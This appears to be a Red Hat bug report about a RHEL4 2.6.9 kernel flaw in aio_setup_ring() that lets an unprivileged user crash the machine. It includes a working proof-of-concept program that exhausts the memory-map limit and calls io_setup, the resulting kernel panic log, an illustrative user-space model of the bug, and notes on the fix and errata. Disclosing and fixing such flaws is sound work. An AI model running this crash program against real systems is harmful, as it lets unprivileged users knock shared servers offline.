Konstantin Khorenko from the OpenVZ/Virtuozzo Linux kernel team has noticed the following issue on the RHEL4 2.6.9-42.0.3 kernel. The aio_setup_ring() function initializes the info->nr_pages variable incorrectly; this variable can then be used in the error path to free the allocated resources. This way an unprivileged user can crash the node. This issue was fixed in the 2.6.10 kernel by the following patch: http://linux.bkbits.net:8080/linux-2.6/gnupatch@418e67e3jfC3msWLXzcdTkI10dwtEg

[finist@svconsole tmp]$ id
uid=500(finist) gid=501(finist) groups=501(finist)
[finist@svconsole tmp]$ uname -a
Linux svconsole.sw.ru 2.6.9-42.0.3.ELsmp #1 SMP Mon Sep 25 17:28:02 EDT 2006 i686 i686 i386 GNU/Linux
[finist@svconsole tmp]$ cat map_count.c
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void)
{
	long res;
	unsigned long ctx = 0;
	int i = 0;
	void *map;

	/* Alternate protections so neighbouring mappings cannot be merged into
	 * one VMA: each call consumes one slot towards vm.max_map_count. */
	while (1) {
		map = mmap(NULL, 100, PROT_READ, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
		if (map == MAP_FAILED)
			break;
		i++;
		map = mmap(NULL, 100, PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
		if (map == MAP_FAILED)
			break;
		i++;
	}
	printf("Done %d mmaps.\n", i);

	/* With the map count exhausted, the ring mmap inside aio_setup_ring()
	 * fails and its error path runs with the wrongly initialized nr_pages. */
	res = syscall(__NR_io_setup, 10000, &ctx);
	if (res != 0)
		printf("Error in io_setup():%ld\n", res);
	return 0;
}
[finist@svconsole tmp]$ cat /proc/sys/vm/max_map_count
65536
[finist@svconsole tmp]$ ./map_count
Done 65526 mmaps.
---- crash here.
mmap err: 12
Unable to handle kernel NULL pointer dereference at virtual address 00000000
 printing eip:
c01489de
*pde = 0eb55001
Oops: 0000 [#1]
SMP
Modules linked in: ip_nat_irc ip_nat_ftp iptable_nat ipt_helper ipt_state ipt_conntrack ip_conntrack_irc ip_conntrack_ftp ip_conntrack ipt_length ipt_LOG ipt_ttl ipt_tcpmss ipt_REJECT ipt_TOS ipt_tos ipt_multiport ipt_limit iptable_mangle md5 ipv6 8021q bridge atm iptable_filter ip_tables dm_mirror dm_mod uhci_hcd 3c59x mii floppy ext3 jbd
CPU:    0
EIP:    0060:[<c01489de>]    Not tainted VLI
EFLAGS: 00010203   (2.6.9-42.0.3.ELsmp)
EIP is at put_page+0x2/0x6d
eax: 00000000   ebx: 00000001   ecx: cf679f7c   edx: 00000000
esi: cfb9c610   edi: cc4dbbc4   ebp: cc4dbb80   esp: cf679f60
ds: 007b   es: 007b   ss: 0068
Process map_count (pid: 3130, threadinfo=cf679000 task=cf3fed10)
Stack: c017a158 cfb9c5e0 cfb9c610 cff0073c cc4dbbc4 c017a30c c02e9bda 0000000c
       0000004f 0000277f cc4dbb80 00002710 cc4dbb80 cfb9c5e0 cf679000 c017a4d3
       bffffa80 ffffffea 00000000 c017b628 00002710 00000000 00000000 cf679000
Call Trace:
 [<c017a158>] aio_free_ring+0x1c/0x9f
 [<c017a30c>] aio_setup_ring+0x131/0x203
 [<c017a4d3>] ioctx_alloc+0xf5/0x17f
 [<c017b628>] sys_io_setup+0x39/0xa5
 [<c02d47cb>] syscall_call+0x7/0xb
 [<c02d007b>] packet_rcv+0x17e/0x307
Code: 35 94 18 00 e9 da fa ff ff e8 4f 94 18 00 e9 6f fb ff ff e8 21 94 18 00 e9 57 fe ff ff e8 3b 94 18 00 e9 d6 fe ff ff 90 90 89 c2 <8b> 00 f6 c4 80 74 2f 8b 52 0c 8b 02 89 d1 f6 c4 80 74 03 8b 4a
<0>Fatal exception: panic in 5 seconds
Kernel panic - not syncing: Fatal exception
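A user-space model of the bug class in the report, added here as an illustration and not taken from the kernel or from this bug thread: the ring bookkeeping records a page count before any page is pinned, so when the ring mmap fails the teardown routine walks NULL entries, which is the put_page() oops in the trace above. The `fixed` variant, which records the count only after pages are actually pinned, is one way to close the hole and is an assumption of this model, not a transcription of the 2.6.10 patch; `page_pool`, `g_info`, `mmap_ok` and `fixed` are constructed names.

```c
#include <errno.h>
#include <stddef.h>
#define MAX_RING_PAGES 8

/* User-space model of the aio ring bookkeeping; not the kernel's code. */
struct page { int refcount; };
struct aio_ring_info { int nr_pages; struct page *ring_pages[MAX_RING_PAGES]; };

static struct page page_pool[MAX_RING_PAGES];  /* constructed backing pages */
static struct aio_ring_info g_info;            /* shared context for checks */

/* Stand-in for put_page(): returns -1 where the kernel would NULL-deref. */
static int put_page(struct page *p)
{
	if (p == NULL)
		return -1;
	p->refcount--;
	return 0;
}

/* Stand-in for aio_free_ring(): trusts nr_pages unconditionally. */
static int free_ring(struct aio_ring_info *info)
{
	for (int i = 0; i < info->nr_pages; i++)
		if (put_page(info->ring_pages[i]) < 0)
			return -1;                         /* oops in put_page, as in the trace */
	info->nr_pages = 0;
	return 0;
}

/* Stand-in for aio_setup_ring(). mmap_ok models the ring mmap succeeding
 * (it fails once vm.max_map_count is exhausted); fixed == 0 reproduces the
 * bug. Returns 0, -ENOMEM/-EINVAL, or -1 for a modelled crash. */
static int setup_ring(struct aio_ring_info *info, int want, int mmap_ok, int fixed)
{
	if (want < 1 || want > MAX_RING_PAGES)
		return -EINVAL;
	/* Bug: with fixed == 0 the count is recorded before anything is pinned. */
	*info = (struct aio_ring_info){ .nr_pages = fixed ? 0 : want };
	if (!mmap_ok) {
		if (free_ring(info) < 0)
			return -1;                         /* put_page(NULL): the reported oops */
		return -ENOMEM;                        /* "mmap err: 12", handled cleanly */
	}
	for (int i = 0; i < want; i++) {           /* models get_user_pages() pinning */
		page_pool[i].refcount++;
		info->ring_pages[i] = &page_pool[i];
	}
	info->nr_pages = want;                     /* count only what is actually pinned */
	return 0;
}
```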
Committed in stream U5 build 42.40. A test kernel with this patch is available from http://people.redhat.com/~jbaron/rhel4/
Fix verified on 42.0.7 with the included testcase.
An advisory has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on the solution and/or where to find the updated files, please follow the link below. You may reopen this bug report if the solution does not work for you. http://rhn.redhat.com/errata/RHSA-2007-0014.html